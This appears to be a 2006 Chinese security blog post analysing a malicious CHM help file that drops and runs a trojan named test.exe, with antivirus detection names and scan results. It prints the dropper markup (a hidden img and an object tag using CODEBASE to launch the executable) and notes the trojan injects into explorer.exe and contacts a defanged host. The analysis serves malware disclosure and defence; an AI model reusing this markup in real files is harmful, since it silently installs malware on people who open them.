[06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)

原创 2006年06月18日 22:58:00

endurer 原创

2006-06-20 第3版 补充:瑞星18.32.10将test.exe报为Trojan.DL.Inject.fg
2006-06-19 第2版 补充:江民KV将test.exe报为TrojanDownloader.Small.mp
2006-06-18 第1

一位网发来的cHM文件中有代码:

 


 

<body onselectstart="return false"; onpaste="return false";>
<img src="test.exe" width=0 height=0>
<img src="001.jpg">
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe">
</object>

 


 

因此打开此CHM文件会释放/运行一个名为test.exe的文件。

test.exe用Microsoft Visual C++ 编写,经UPX压缩,会用线程插入explorer.exe,试图访问:hxxp://gd.vnet.cn


File: test.exe
Status: POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database)
MD5 1d0b29b416ebe8e942173a326eb6e1ed
Packers detected: UPX
Scanner results
AntiVir Found Heuristic/Hijacker (probable variant)
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VirusBuster Found nothing
VBA32 Found nothing

相关文章推荐

用myeclipse如何将java程序生成一个.exe可运行文件?

总得来说有两步,先打成jar包再打成exe。 第一步打成jar: 方法一:用Eclipse自带的打包工具Ant打包,因为要自己编写xml脚本语言,还要增加一些外部的jar,所以不推荐。 ...

MATLAB .M文件编译成.EXE并在无MATLAB的电脑上运行的一个方法

做了半年的GUI的毕设,说说GUI编译的一个方法吧 首先确保安装了MATLAB以及VS(只是一个方法,不是唯一的),我的是MATLAB(2010A)和MS VISUAL STUDIO 2010,需要三...
  • davied9
  • davied9
  • 2012年07月10日 17:38
  • 8581

如何把一个java程序打包成exe文件,运行在没有java环境里

核心提示:首先,将编译好的程序打包成jar文件,然后做出exe,这样代码就不可见了;但是exe文件在没有安装jre的电脑上不能运行,如果要求客户再去安装jre 设置环境变量 就不雅了。我们需要将jre...

用myeclipse如何将java程序生成一个.exe可运行文件?

总得来说有两步,先打成jar包再打成exe。 第一步打成jar:用myeclipse如何将java程序生成一个.exe可运行文件? 方法一:用Eclipse自带的打包工具Ant打包,因为要自己编写...

[木马]不释放资源到本地文件系统,直接运行其内嵌exe程序 卡巴竟然报毒,MSE正常

可以运行,但是杀软报毒,源码主要收集于网络,非自创,加工组合而已:   #include "stdafx.h" #include "resource.h" typedef IMAGE_SEC...

day20打印流,删除一个带内容的目录,用于记录应用程序运行次数,多个读取流变成一个读取流,切割文件

/* 打印流: 该流提供了打印方法,可以将各种数据类型的数据都原样打印 字节打印流 PrintStream 构造函数可以接收的参数类型 1.file对象 file 2.字符串路径。S...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:[06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)
举报原因:
原因补充:

(最多只允许输入30个字)